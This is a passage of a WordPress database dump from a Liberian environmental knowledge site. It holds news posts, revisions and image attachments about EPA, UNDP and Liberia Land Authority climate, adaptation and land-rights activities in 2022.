dir=\"ltr\" role=\"presentation\">livelihoods.</span> <span dir=\"ltr\" role=\"presentation\">The</span> <span dir=\"ltr\" role=\"presentation\">Project</span> <span dir=\"ltr\" role=\"presentation\">includes</span> <span dir=\"ltr\" role=\"presentation\">an </span><span dir=\"ltr\" role=\"presentation\">infrastructure component for the construction a rock rev</span><span dir=\"ltr\" role=\"presentation\">etment to protect West Point against coastal </span><span dir=\"ltr\" role=\"presentation\">erosion and storms. The Project will run from 26 June 2021 to 25 June 2026.\r\n</span></span>\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/06/TOR-for-Monitoring-Evaluation-Officer-final-draft-Randa-Reviewed.pdf\" target=\"_blank\" rel=\"noopener\">M&amp;E Officer Wanted</a></strong></em>','Monitoring & Evaluation Officer Needed for Monrovia Metropolitan Climate Resilience Project','','inherit','closed','closed','','4738-revision-v1','','','2022-06-22 09:43:32','2022-06-22 09:43:32','',4738,'https://ekmsliberia.info/?p=4740',0,'revision','',0),(4741,42,'2022-04-26 10:14:00','2022-04-26 10:14:00','<!-- wp:paragraph -->\n<p>In Accra, Ghana, Liberia is being represented by the Environment Protection Agency - EPA Deputy Executive Director, Hon. Randall M. Dobayou, II at the Validation of the ECOWAS Regional Climate Strategy and Climate Financing Strategy meeting. The meeting is intended to encourage a low-carbon development trajectory as investment in renewable energy sources is a priority. The ultimate goal at the end of this meeting is to endorse and validate the ECOWAS Climate Regional Strategy.</p>\n<!-- /wp:paragraph -->','Hon. Dobayou, II Represents Liberia at the Validation of the ECOWAS Regional Climate Strategy and Climate Financing Strategy meeting in Accra, Ghana','','publish','open','closed','','hon-dobayou-ii-represents-liberia-at-the-validation-of-the-ecowas-regional-climate-strategy-and-climate-financing-strategy-meeting-in-accra-ghana','','','2022-06-22 10:19:56','2022-06-22 10:19:56','',0,'https://ekmsliberia.info/?p=4741',118,'post','',0),(4742,42,'2022-06-22 10:19:23','2022-06-22 10:19:23','','meeting','','inherit','open','closed','','meeting-2','','','2022-06-22 10:19:23','2022-06-22 10:19:23','',4741,'https://ekmsliberia.info/wp-content/uploads/2022/06/meeting.png',0,'attachment','image/png',0),(4743,42,'2022-06-22 10:19:54','2022-06-22 10:19:54','<!-- wp:paragraph -->\n<p>In Accra, Ghana, Liberia is being represented by the Environment Protection Agency - EPA Deputy Executive Director, Hon. Randall M. Dobayou, II at the Validation of the ECOWAS Regional Climate Strategy and Climate Financing Strategy meeting. The meeting is intended to encourage a low-carbon development trajectory as investment in renewable energy sources is a priority. The ultimate goal at the end of this meeting is to endorse and validate the ECOWAS Climate Regional Strategy.</p>\n<!-- /wp:paragraph -->','Hon. Dobayou, II Represents Liberia at the Validation of the ECOWAS Regional Climate Strategy and Climate Financing Strategy meeting in Accra, Ghana','','inherit','closed','closed','','4741-revision-v1','','','2022-06-22 10:19:54','2022-06-22 10:19:54','',4741,'https://ekmsliberia.info/?p=4743',0,'revision','',0),(4744,42,'2022-04-25 10:20:00','2022-04-25 10:20:00','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency, with support from the NAP Global, has launched an initiative to develop Monitoring, Evaluation and Learning System for Liberia National Adaptation Plan. The initiative launched on Friday, April 22, 2022 at the Lutheran Compound in Sinkor, is geared towards establishing a monitoring mechanisms to evaluate the progress the country is making in it\'s National Adaptation Plan. Speaking on behalf of the Executive Director of the EPA, Mr. Arthur M. Becker, Project Officer said the workshop is the beginning of several interactive discussions that will culminate into the development of a Monitoring, Evaluation and Learning System for Liberia.Also making remarks, the National Consultant, Mr. J. Peryekor Dahn lauded the support of the NAP Global and it\'s partners for the initiative and said the process involves every sector in Liberia and therefore no one is left behind in the preparation for the development of the MEL.</p>\n<!-- /wp:paragraph -->','The EPA, with Support from the NAP Global, Has Launched an Initiative to Develop Monitoring, Evaluation and Learning System for Liberia National Adaptation Plan','','publish','open','closed','','the-epa-with-support-from-the-nap-global-has-launched-an-initiative-to-develop-monitoring-evaluation-and-learning-system-for-liberia-national-adaptation-plan','','','2022-06-22 10:26:36','2022-06-22 10:26:36','',0,'https://ekmsliberia.info/?p=4744',117,'post','',0),(4745,42,'2022-06-22 10:26:09','2022-06-22 10:26:09','','validation','','inherit','open','closed','','validation','','','2022-06-22 10:26:09','2022-06-22 10:26:09','',4744,'https://ekmsliberia.info/wp-content/uploads/2022/06/validation-.png',0,'attachment','image/png',0),(4746,42,'2022-06-22 10:26:34','2022-06-22 10:26:34','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency, with support from the NAP Global, has launched an initiative to develop Monitoring, Evaluation and Learning System for Liberia National Adaptation Plan. The initiative launched on Friday, April 22, 2022 at the Lutheran Compound in Sinkor, is geared towards establishing a monitoring mechanisms to evaluate the progress the country is making in it\'s National Adaptation Plan. Speaking on behalf of the Executive Director of the EPA, Mr. Arthur M. Becker, Project Officer said the workshop is the beginning of several interactive discussions that will culminate into the development of a Monitoring, Evaluation and Learning System for Liberia.Also making remarks, the National Consultant, Mr. J. Peryekor Dahn lauded the support of the NAP Global and it\'s partners for the initiative and said the process involves every sector in Liberia and therefore no one is left behind in the preparation for the development of the MEL.</p>\n<!-- /wp:paragraph -->','The EPA, with Support from the NAP Global, Has Launched an Initiative to Develop Monitoring, Evaluation and Learning System for Liberia National Adaptation Plan','','inherit','closed','closed','','4744-revision-v1','','','2022-06-22 10:26:34','2022-06-22 10:26:34','',4744,'https://ekmsliberia.info/?p=4746',0,'revision','',0),(4747,42,'2022-05-10 10:34:00','2022-05-10 10:34:00','<!-- wp:paragraph -->\n<p>Conservation International, EPA hold inception workshop for the Food Systems, Land Use, and Restoration (FOLUR) Project with funding from the Global Environment Facility. The FULOR project aims to promote biodiversity conservation and sustainable food systems for enhanced livelihood opportunities in the North-West of Liberia Landscape through land use planning, restoration of degraded lands, and strengthening governance, policies and market incentives for nationally replicable models of deforestation-free cocoa and palm oil value chain.</p>\n<!-- /wp:paragraph -->','Conservation International & EPA hold Inception Workshop for the Food Systems, Land Use, and Restoration (FOLUR) Project','','publish','open','closed','','conservation-international-epa-hold-inception-workshop-for-the-food-systems-land-use-and-restoration-folur-project','','','2022-06-22 10:43:30','2022-06-22 10:43:30','',0,'https://ekmsliberia.info/?p=4747',116,'post','',0),(4748,42,'2022-06-22 10:42:14','2022-06-22 10:42:14','','CI and EPA','','inherit','open','closed','','ci-and-epa','','','2022-06-22 10:42:14','2022-06-22 10:42:14','',4747,'https://ekmsliberia.info/wp-content/uploads/2022/06/CI-and-EPA.png',0,'attachment','image/png',0),(4749,42,'2022-06-22 10:43:28','2022-06-22 10:43:28','<!-- wp:paragraph -->\n<p>Conservation International, EPA hold inception workshop for the Food Systems, Land Use, and Restoration (FOLUR) Project with funding from the Global Environment Facility. The FULOR project aims to promote biodiversity conservation and sustainable food systems for enhanced livelihood opportunities in the North-West of Liberia Landscape through land use planning, restoration of degraded lands, and strengthening governance, policies and market incentives for nationally replicable models of deforestation-free cocoa and palm oil value chain.</p>\n<!-- /wp:paragraph -->','Conservation International & EPA hold Inception Workshop for the Food Systems, Land Use, and Restoration (FOLUR) Project','','inherit','closed','closed','','4747-revision-v1','','','2022-06-22 10:43:28','2022-06-22 10:43:28','',4747,'https://ekmsliberia.info/?p=4749',0,'revision','',0),(4750,42,'2022-05-13 10:44:00','2022-05-13 10:44:00','<!-- wp:paragraph -->\n<p>Today, national partners-Ministry of Mines &amp; Energy and Environment Protection Agency - EPA in partnership with UNDP Liberia conducted an appraisal of Global Environment Facility 10m coastal community project in Greenville, Sinoe County to mitigate the threat of sea erosion posed to over 16,000 people. The holding of the Local Project Appraisal Committee (LPAC) meeting was to present the project to partners for final endorsement and comments from the Government of Liberia and representatives of the direct beneficiaries. The project when endorsed, will protect communities &amp; their assets, &amp; diversify livelihoods through various income streams.</p>\n<!-- /wp:paragraph -->','Ministry of Mines & Energy & EPA in Collaboration with UNDP Conducted an Appraisal of Global Environment Facility 10m Coastal Community Project','','publish','open','closed','','ministry-of-mines-energy-epa-in-collaboration-with-undp-conducted-an-appraisal-of-global-environment-facility-10m-coastal-community-project','','','2022-06-22 10:51:53','2022-06-22 10:51:53','',0,'https://ekmsliberia.info/?p=4750',115,'post','',0),(4751,42,'2022-06-22 10:51:05','2022-06-22 10:51:05','','MME & EPA','','inherit','open','closed','','mme-epa','','','2022-06-22 10:51:05','2022-06-22 10:51:05','',4750,'https://ekmsliberia.info/wp-content/uploads/2022/06/MME-EPA.png',0,'attachment','image/png',0),(4752,42,'2022-06-22 10:51:51','2022-06-22 10:51:51','<!-- wp:paragraph -->\n<p>Today, national partners-Ministry of Mines &amp; Energy and Environment Protection Agency - EPA in partnership with UNDP Liberia conducted an appraisal of Global Environment Facility 10m coastal community project in Greenville, Sinoe County to mitigate the threat of sea erosion posed to over 16,000 people. The holding of the Local Project Appraisal Committee (LPAC) meeting was to present the project to partners for final endorsement and comments from the Government of Liberia and representatives of the direct beneficiaries. The project when endorsed, will protect communities &amp; their assets, &amp; diversify livelihoods through various income streams.</p>\n<!-- /wp:paragraph -->','Ministry of Mines & Energy & EPA in Collaboration with UNDP Conducted an Appraisal of Global Environment Facility 10m Coastal Community Project','','inherit','closed','closed','','4750-revision-v1','','','2022-06-22 10:51:51','2022-06-22 10:51:51','',4750,'https://ekmsliberia.info/?p=4752',0,'revision','',0),(4753,42,'2022-05-13 10:51:00','2022-05-13 10:51:00','<!-- wp:paragraph -->\n<p>To increase awareness of the Land Rights Act (LRA) and the Act that established the LLA, including other national and international legal instruments that protect and promote women and young girls, persons with disabilities and marginalized groups\' rights to land ownership, the LLA with support from the Sida/Lantmäteriet funded Capacity Building for Inclusive Land Administration and Management Project/ILAMP, on May 13, 2022, ended a robust awareness campaign in five (5) districts, namely; Kolahun, Voinjama, Quadu-Gboni, Zorzor and Salayea. The awareness covered fifteen (15) selected communities, namely; Popalahun, Massabolahun, Selega, Barzewein, Sarkonedu, Marvekonedu, Samodu, Barkedu, Nyanmakamandu, Gbebedu, Nasadu, David-Selma Town, Passama, Gorlu and Beyan Town. Further, the campaign brought together stakeholders, local government officials, traditional leaders, women and youth groups, persons with disabilities, and marginalized groups in Lofa County. The awareness which is being held under the theme: \"Women and men have the right to own land\" is expected to continue in Nimba, Bong and Margibi counties.</p>\n<!-- /wp:paragraph -->','LLA Ends Massive Awareness on Women\'s Land Rights in Lofa County','','publish','open','closed','','lla-ends-massive-awareness-on-womens-land-rights-in-lofa-county','','','2022-06-22 10:56:57','2022-06-22 10:56:57','',0,'https://ekmsliberia.info/?p=4753',114,'post','',0),(4754,42,'2022-06-22 10:56:14','2022-06-22 10:56:14','','awareness','','inherit','open','closed','','awareness','','','2022-06-22 10:56:14','2022-06-22 10:56:14','',4753,'https://ekmsliberia.info/wp-content/uploads/2022/06/awareness.png',0,'attachment','image/png',0),(4755,42,'2022-06-22 10:56:54','2022-06-22 10:56:54','<!-- wp:paragraph -->\n<p>To increase awareness of the Land Rights Act (LRA) and the Act that established the LLA, including other national and international legal instruments that protect and promote women and young girls, persons with disabilities and marginalized groups\' rights to land ownership, the LLA with support from the Sida/Lantmäteriet funded Capacity Building for Inclusive Land Administration and Management Project/ILAMP, on May 13, 2022, ended a robust awareness campaign in five (5) districts, namely; Kolahun, Voinjama, Quadu-Gboni, Zorzor and Salayea. The awareness covered fifteen (15) selected communities, namely; Popalahun, Massabolahun, Selega, Barzewein, Sarkonedu, Marvekonedu, Samodu, Barkedu, Nyanmakamandu, Gbebedu, Nasadu, David-Selma Town, Passama, Gorlu and Beyan Town. Further, the campaign brought together stakeholders, local government officials, traditional leaders, women and youth groups, persons with disabilities, and marginalized groups in Lofa County. The awareness which is being held under the theme: \"Women and men have the right to own land\" is expected to continue in Nimba, Bong and Margibi counties.</p>\n<!-- /wp:paragraph -->','LLA Ends Massive Awareness on Women\'s Land Rights in Lofa County','','inherit','closed','closed','','4753-revision-v1','','','2022-06-22 10:56:54','2022-06-22 10:56:54','',4753,'https://ekmsliberia.info/?p=4755',0,'revision','',0),(4756,42,'2022-05-31 10:58:00','2022-05-31 10:58:00','<!-- wp:paragraph -->\n<p>The EPA through the National Climate Change Secretariat (NCCS) in partnership with the African Development Bank on Tuesday, May 31, 2022 held a stakeholders\' consultation and awareness on \"Enhancing Climate Information Systems for Resilient Development in Liberia (CIS). The event was held in West Point.</p>\n<!-- /wp:paragraph -->','The EPA Through the National Climate Change Secretariat in Partnership With the African Development Bank Held a Stakeholders\' Consultation','','publish','open','closed','','the-epa-through-the-national-climate-change-secretariat-in-partnership-with-the-african-development-bank-held-a-stakeholders-consultation','','','2022-06-22 11:02:30','2022-06-22 11:02:30','',0,'https://ekmsliberia.info/?p=4756',113,'post','',0),(4757,42,'2022-06-22 11:01:47','2022-06-22 11:01:47','','epa','','inherit','open','closed','','epa-8','','','2022-06-22 11:01:47','2022-06-22 11:01:47','',4756,'https://ekmsliberia.info/wp-content/uploads/2022/06/epa.png',0,'attachment','image/png',0),(4758,42,'2022-06-22 11:02:28','2022-06-22 11:02:28','<!-- wp:paragraph -->\n<p>The EPA through the National Climate Change Secretariat (NCCS) in partnership with the African Development Bank on Tuesday, May 31, 2022 held a stakeholders\' consultation and awareness on \"Enhancing Climate Information Systems for Resilient Development in Liberia (CIS). The event was held in West Point.</p>\n<!-- /wp:paragraph -->','The EPA Through the National Climate Change Secretariat in Partnership With the African Development Bank Held a Stakeholders\' Consultation','','inherit','closed','closed','','4756-revision-v1','','','2022-06-22 11:02:28','2022-06-22 11:02:28','',4756,'https://ekmsliberia.info/?p=4758',0,'revision','',0),(4759,42,'2022-06-03 11:02:00','2022-06-03 11:02:00','<!-- wp:paragraph -->\n<p>EPA and UNDP Liberia, with funding from Global Environment Facility, on Thursday, June 2, 2022 commenced a two-day National and Sub-National Environmental Awareness Campaign in Gbarnga, Bong County. The two-day event, which attracted local government officials including city majors and development superintendents from 12 counties, representatives of environmental groups and line ministries, agencies and commissions of government seeks to among many others improved the understanding and interpretation of global environmental trends and socioeconomic implications. The event which is funded by the Global Environment Facility is being held under the auspices of the Cross-Cutting Capacity Development Project.</p>\n<!-- /wp:paragraph -->','EPA and UNDP- Liberia Commenced a Two-Day National and Sub-National Environmental Awareness Campaign in Gbarnga, Bong County','','publish','open','closed','','epa-and-undp-liberia-commenced-a-two-day-national-and-sub-national-environmental-awareness-campaign-in-gbarnga-bong-county','','','2022-06-22 11:06:45','2022-06-22 11:06:45','',0,'https://ekmsliberia.info/?p=4759',112,'post','',0),(4760,42,'2022-06-22 11:06:13','2022-06-22 11:06:13','','epa & undp','','inherit','open','closed','','epa-undp','','','2022-06-22 11:06:13','2022-06-22 11:06:13','',4759,'https://ekmsliberia.info/wp-content/uploads/2022/06/epa-undp.png',0,'attachment','image/png',0),(4761,42,'2022-06-22 11:06:43','2022-06-22 11:06:43','<!-- wp:paragraph -->\n<p>EPA and UNDP Liberia, with funding from Global Environment Facility, on Thursday, June 2, 2022 commenced a two-day National and Sub-National Environmental Awareness Campaign in Gbarnga, Bong County. The two-day event, which attracted local government officials including city majors and development superintendents from 12 counties, representatives of environmental groups and line ministries, agencies and commissions of government seeks to among many others improved the understanding and interpretation of global environmental trends and socioeconomic implications. The event which is funded by the Global Environment Facility is being held under the auspices of the Cross-Cutting Capacity Development Project.</p>\n<!-- /wp:paragraph -->','EPA and UNDP- Liberia Commenced a Two-Day National and Sub-National Environmental Awareness Campaign in Gbarnga, Bong County','','inherit','closed','closed','','4759-revision-v1','','','2022-06-22 11:06:43','2022-06-22 11:06:43','',4759,'https://ekmsliberia.info/?p=4761',0,'revision','',0),(4762,42,'2022-06-20 11:08:00','2022-06-20 11:08:00','<!-- wp:paragraph -->\n<p>Liberia Institute of Statistics and Geo Information Services (LISGIS) with support from UNDP Liberia and UNDP SURGE DATA HUB, conducts 5-day Training for field enumerators in the use of digital data analysis, visualization and reporting tools specifically on Power BI. Microsoft Power BI is a business analytics service that gives users a single view of their business/organizational data, with the ability to monitor the health of a business/organization using live dashboards, create rich interactive reports and access data on the go, from mobile devices. The training workshop is in response to the capacity needs of relevant institutions to further support the analysis of the Digital Socioeconomic Impact Assessment (SEIA) data collected about the informal sector. The training is being facilitated by UNDP surge data hub colleagues as well as UNDP Liberia, LISGIS and the Ministry of Finance and Development Planning (MFDP).</p>\n<!-- /wp:paragraph -->','LISGIS, with Support from UNDP and UNDP SURGE DATA HUB, Conducts 5-day Training for Field Enumerators','','publish','open','closed','','lisgis-with-support-from-undp-and-undp-surge-data-hub-conducts-5-day-training-for-field-enumerators','','','2022-06-22 11:12:55','2022-06-22 11:12:55','',0,'https://ekmsliberia.info/?p=4762',111,'post','',0),(4763,42,'2022-06-22 11:12:25','2022-06-22 11:12:25','','lisgis','','inherit','open','closed','','lisgis-3','','','2022-06-22 11:12:25','2022-06-22 11:12:25','',4762,'https://ekmsliberia.info/wp-content/uploads/2022/06/lisgis.png',0,'attachment','image/png',0),(4764,42,'2022-06-22 11:12:53','2022-06-22 11:12:53','<!-- wp:paragraph -->\n<p>Liberia Institute of Statistics and Geo Information Services (LISGIS) with support from UNDP Liberia and UNDP SURGE DATA HUB, conducts 5-day Training for field enumerators in the use of digital data analysis, visualization and reporting tools specifically on Power BI. Microsoft Power BI is a business analytics service that gives users a single view of their business/organizational data, with the ability to monitor the health of a business/organization using live dashboards, create rich interactive reports and access data on the go, from mobile devices. The training workshop is in response to the capacity needs of relevant institutions to further support the analysis of the Digital Socioeconomic Impact Assessment (SEIA) data collected about the informal sector. The training is being facilitated by UNDP surge data hub colleagues as well as UNDP Liberia, LISGIS and the Ministry of Finance and Development Planning (MFDP).</p>\n<!-- /wp:paragraph -->','LISGIS, with Support from UNDP and UNDP SURGE DATA HUB, Conducts 5-day Training for Field Enumerators','','inherit','closed','closed','','4762-revision-v1','','','2022-06-22 11:12:53','2022-06-22 11:12:53','',4762,'https://ekmsliberia.info/?p=4764',0,'revision','',0),(4765,42,'2022-06-14 15:14:00','2022-06-14 15:14:00','<!-- wp:paragraph -->\n<p>To increase awareness on the Land Rights Act (LRA) of 2018 and the LLA Act of 2016, including other national and international legal instruments that promote and protect women and young girls, people with disabilities and marginalized groups, the LLA with support from Lantmätariet-SIDA funded Capacity Building for Inclusive Land Administration and Management Project (ILAMP), has ended a robust awareness campaign on women\'s land rights in Nimba County. The awareness campaign targeted fifteen communities, namely; Sehyikimpa, Zor-Gowee, Zor-Tehipa, Zor-Gbarplay, Gbao-Gbalasonah, Duo-Tiayee, Loyee, Gbei-Tengbe, Douwin, Zaglay, Zuoplay, Korsen, Tunupuyee, Whipa and Garr-Busie.</p>\n<!-- /wp:paragraph -->','LLA Ends Awareness on the Land Rights Acts of 2018 & LLA Act of 2016','','publish','open','closed','','lla-ends-awareness-on-the-land-rights-acts-of-2018-lla-act-of-2016','','','2022-06-22 11:19:48','2022-06-22 11:19:48','',0,'https://ekmsliberia.info/?p=4765',110,'post','',0),(4766,42,'2022-06-22 11:18:51','2022-06-22 11:18:51','','lla','','inherit','open','closed','','lla','','','2022-06-22 11:18:51','2022-06-22 11:18:51','',4765,'https://ekmsliberia.info/wp-content/uploads/2022/06/lla-.png',0,'attachment','image/png',0),(4767,42,'2022-06-22 11:19:46','2022-06-22 11:19:46','<!-- wp:paragraph -->\n<p>To increase awareness on the Land Rights Act (LRA) of 2018 and the LLA Act of 2016, including other national and international legal instruments that promote and protect women and young girls, people with disabilities and marginalized groups, the LLA with support from Lantmätariet-SIDA funded Capacity Building for Inclusive Land Administration and Management Project (ILAMP), has ended a robust awareness campaign on women\'s land rights in Nimba County. The awareness campaign targeted fifteen communities, namely; Sehyikimpa, Zor-Gowee, Zor-Tehipa, Zor-Gbarplay, Gbao-Gbalasonah, Duo-Tiayee, Loyee, Gbei-Tengbe, Douwin, Zaglay, Zuoplay, Korsen, Tunupuyee, Whipa and Garr-Busie.</p>\n<!-- /wp:paragraph -->','LLA Ends Awareness on the Land Rights Acts of 2018 & LLA Act of 2016','','inherit','closed','closed','','4765-revision-v1','','','2022-06-22 11:19:46','2022-06-22 11:19:46','',4765,'https://ekmsliberia.info/?p=4767',0,'revision','',0),(4768,42,'2022-06-13 16:20:00','2022-06-13 16:20:00','<!-- wp:paragraph -->\n<p>Liberia Land Authority (LLA) in collaboration with ArcelorMittal Liberia (AML) has presented a Public Land Sale Deeds to 12 farmers in Gbaoa and Zolowee Towns in Nimba County. The process which began started in late 2021, aimed at legitimizing the status of these farmers who lands are being leased by the company. Held at the same Gbapa Town Hall on Friday June 10, 2022. The program brought together high-profile delegates from Arcelor Mittal Liberia, the Liberia Land Authority and the farmers and other stakeholders. Giving the objective of the occasion, Cllr. Kula L. Jackson, Commissioner on Land Policy and Planning disclosed that the occasion was meant to legalize the people\'s land ownership, considering how essential land ownership is in keeping the peace we now enjoy.Presenting the deeds to the respective owners at the ceremony, the Chairman of the Liberia Land Authority, Atty. J. Adams Manobah, Sr., described the process as part fulfilling the government’s promise in upholding the Pro-poor Agenda for Prosperity and Development. According to Chairman Manobah, the process will also positively contribute to the economic status of the as they legally get into a lease agreement and partnership with AML.The LLA Boss specified that, considering the many conflicts that come from the land sector around the country, the government through his leadership is handling every land matter with care and consciousness. Chairman Manobah disclosed that, if the land disputes are not handled appropriately, it could lead to the nation’s next civil conflict. It is however hoped that all Liberians will see the need to help solve these disputes arising at community and clan levels before it escalates to raise national concerns. He also used the occasion to urge farmers who received their deeds to continue paying their taxes to the government so as to be in good standing with the government. AML lawyer, Cllr. Boakai Paegar mentioned that the company has decided to pre-pay on behalf of the farmers in the legalization process so as to continue being in good standing with the law. Cllr. Paegar wants the rest of the farmers to ensure that they get involve into the phase 2 of the process that is coming up shortly. Adding that, the company is not willing to do business with those who are out of the law. Meanwhile, the farmers used the occasion to laud AML and the LLA for the initiative. They stressed that the process has now made them proud and legitimate land owners. The farmers also used the seized the moment to encourage the rest of their colleagues to take part in the phase 2 of the process so as to avoid future hindrances.</p>\n<!-- /wp:paragraph -->','Liberia Land Authority (LLA) in Collaboration with Arcelor Mittal Liberia (AML) has Presented Public Land Sale Deeds to 12 farmers in Gbaoa and Zolowee Towns in Nimba County','','publish','open','closed','','liberia-land-authority-lla-in-collaboration-with-arcelor-mittal-liberia-aml-has-presented-public-land-sale-deeds-to-12-farmers-in-gbaoa-and-zolowee-towns-in-nimba-county','','','2022-06-22 11:24:45','2022-06-22 11:24:45','',0,'https://ekmsliberia.info/?p=4768',109,'post','',0),(4769,42,'2022-06-22 11:24:06','2022-06-22 11:24:06','','lla & arcelor','','inherit','open','closed','','lla-arcelor','','','2022-06-22 11:24:06','2022-06-22 11:24:06','',4768,'https://ekmsliberia.info/wp-content/uploads/2022/06/lla-arcelor.png',0,'attachment','image/png',0),(4770,42,'2022-06-22 11:24:44','2022-06-22 11:24:44','<!-- wp:paragraph -->\n<p>Liberia Land Authority (LLA) in collaboration with ArcelorMittal Liberia (AML) has presented a Public Land Sale Deeds to 12 farmers in Gbaoa and Zolowee Towns in Nimba County. The process which began started in late 2021, aimed at legitimizing the status of these farmers who lands are being leased by the company. Held at the same Gbapa Town Hall on Friday June 10, 2022. The program brought together high-profile delegates from Arcelor Mittal Liberia, the Liberia Land Authority and the farmers and other stakeholders. Giving the objective of the occasion, Cllr. Kula L. Jackson, Commissioner on Land Policy and Planning disclosed that the occasion was meant to legalize the people\'s land ownership, considering how essential land ownership is in keeping the peace we now enjoy.Presenting the deeds to the respective owners at the ceremony, the Chairman of the Liberia Land Authority, Atty. J. Adams Manobah, Sr., described the process as part fulfilling the government’s promise in upholding the Pro-poor Agenda for Prosperity and Development. According to Chairman Manobah, the process will also positively contribute to the economic status of the as they legally get into a lease agreement and partnership with AML.The LLA Boss specified that, considering the many conflicts that come from the land sector around the country, the government through his leadership is handling every land matter with care and consciousness. Chairman Manobah disclosed that, if the land disputes are not handled appropriately, it could lead to the nation’s next civil conflict. It is however hoped that all Liberians will see the need to help solve these disputes arising at community and clan levels before it escalates to raise national concerns. He also used the occasion to urge farmers who received their deeds to continue paying their taxes to the government so as to be in good standing with the government. AML lawyer, Cllr. Boakai Paegar mentioned that the company has decided to pre-pay on behalf of the farmers in the legalization process so as to continue being in good standing with the law. Cllr. Paegar wants the rest of the farmers to ensure that they get involve into the phase 2 of the process that is coming up shortly. Adding that, the company is not willing to do business with those who are out of the law. Meanwhile, the farmers used the occasion to laud AML and the LLA for the initiative. They stressed that the process has now made them proud and legitimate land owners. The farmers also used the seized the moment to encourage the rest of their colleagues to take part in the phase 2 of the process so as to avoid future hindrances.</p>\n<!-- /wp:paragraph -->','Liberia Land Authority (LLA) in Collaboration with Arcelor Mittal Liberia (AML) has Presented Public Land Sale Deeds to 12 farmers in Gbaoa and Zolowee Towns in Nimba County','','inherit','closed','closed','','4768-revision-v1','','','2022-06-22 11:24:44','2022-06-22 11:24:44','',4768,'https://ekmsliberia.info/?p=4770',0,'revision','',0),(4771,42,'2022-06-02 15:24:00','2022-06-02 15:24:00','<!-- wp:paragraph -->\n<p>In Zwedru, Grand Gedeh, over 30 employees of the Liberia Land Authority (LLA) are currently undergoing a 3-day training workshop on the LLA counties office Standard Operating Procedures, with participants being drawn from LLA counties offices in 5 Southeastern Counties including Maryland, Grand Kru, Sinoe, River Gee, and Grand Gedeh Counties, respectively. Giving the overview of the occasion on Wednesday, June 1, 2022, in Zwedru, Grand Gedeh County, the Vice Chair of LLA, Madam P. Bloh Sayeh revealed that the three-day workshop is intended to widen the understanding of the LLA counties.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She revealed that similar workshop will be held in Gbarnga which will be hosting participants from Lofa, Nimba, and Margibi, while Buchanan will have hosting participants from Grand Cape Mount, Gbarpolu, Rivercess, Bomi, and Montserrado Counties. According to Madam Sayeh, there was an assessment done for the Land offices in Liberia and one of the outcomes of the assessment is the need for a Standard Operating Procedures (SOP) which covers the mandate of LLA. The LLA Vice Chairman noted that the board of commissioners all agreed that there is a need for a comprehensive SOP for the County Land offices and decided that there should be a workshop to prepare the LLA workers along with partners and Civil Society Organizations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She disclosed that the ongoing training is sponsored by the Swedish Land Agency LANTMÄTERIAT for the local staff in the use of the SOP manual in ensuring maximum satisfaction for the customers.She expressed appreciation on behalf of the LLA Chairman, J. Adam Manobah, all Commissioners, staff of the LLA, and partners most especially those who contributed financially to the creation of the SOP manual. She named USAID, UN Women, World Bank, SIDA, Civil Society Organizations, Government Stakeholders, and most importantly His Excellency Dr. George Manneh Weah President of the Republic of Liberia for his numerous supports to reach this point. Also, speaking at the opening ceremony of the three days’ workshop, Commissioner J. Josephus Burgess, Sr. who pointed out that the essence of the training is to improve the government\'s decentralization policy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He indicated that for any administration to succeed, it must be innovative by that motivation will engulf staff for the achievement of the organization\'s goals. He emphasized the need for trust in any work environment. Commissioner Burgess called on all participants to pay more attention to the training to take the lessons learned to their respective Counties. For his part, Director Samuel Kpakio termed the occasion as important in the execution of the work of LLA staff across the Country. He called on participants to be attentive because the LLA administration wants to see that professional services are rendered to its numerous customers. The 3-day training workshop in Grand Gedeh County started on Wednesday, June 1, 2022, and is expected to end on Friday, June 3, 2022. The opening occasion of the workshop was graced by Grand Gedeh County local authorities represented by the County superintendent Hon. Kai Garlo Farley, the mass media amongst others.</p>\n<!-- /wp:paragraph -->','LLA Begins 3-days Training On Standard Operating Procedures (SOP)','','publish','open','closed','','lla-begins-3-days-training-on-standard-operating-procedures-sop','','','2022-06-22 11:32:41','2022-06-22 11:32:41','',0,'https://ekmsliberia.info/?p=4771',108,'post','',0),(4772,42,'2022-06-22 11:31:52','2022-06-22 11:31:52','','workshop','','inherit','open','closed','','workshop-2','','','2022-06-22 11:31:52','2022-06-22 11:31:52','',4771,'https://ekmsliberia.info/wp-content/uploads/2022/06/workshop.png',0,'attachment','image/png',0),(4773,42,'2022-06-22 11:32:39','2022-06-22 11:32:39','<!-- wp:paragraph -->\n<p>In Zwedru, Grand Gedeh, over 30 employees of the Liberia Land Authority (LLA) are currently undergoing a 3-day training workshop on the LLA counties office Standard Operating Procedures, with participants being drawn from LLA counties offices in 5 Southeastern Counties including Maryland, Grand Kru, Sinoe, River Gee, and Grand Gedeh Counties, respectively. Giving the overview of the occasion on Wednesday, June 1, 2022, in Zwedru, Grand Gedeh County, the Vice Chair of LLA, Madam P. Bloh Sayeh revealed that the three-day workshop is intended to widen the understanding of the LLA counties.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She revealed that similar workshop will be held in Gbarnga which will be hosting participants from Lofa, Nimba, and Margibi, while Buchanan will have hosting participants from Grand Cape Mount, Gbarpolu, Rivercess, Bomi, and Montserrado Counties. According to Madam Sayeh, there was an assessment done for the Land offices in Liberia and one of the outcomes of the assessment is the need for a Standard Operating Procedures (SOP) which covers the mandate of LLA. The LLA Vice Chairman noted that the board of commissioners all agreed that there is a need for a comprehensive SOP for the County Land offices and decided that there should be a workshop to prepare the LLA workers along with partners and Civil Society Organizations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She disclosed that the ongoing training is sponsored by the Swedish Land Agency LANTMÄTERIAT for the local staff in the use of the SOP manual in ensuring maximum satisfaction for the customers.She expressed appreciation on behalf of the LLA Chairman, J. Adam Manobah, all Commissioners, staff of the LLA, and partners most especially those who contributed financially to the creation of the SOP manual. She named USAID, UN Women, World Bank, SIDA, Civil Society Organizations, Government Stakeholders, and most importantly His Excellency Dr. George Manneh Weah President of the Republic of Liberia for his numerous supports to reach this point. Also, speaking at the opening ceremony of the three days’ workshop, Commissioner J. Josephus Burgess, Sr. who pointed out that the essence of the training is to improve the government\'s 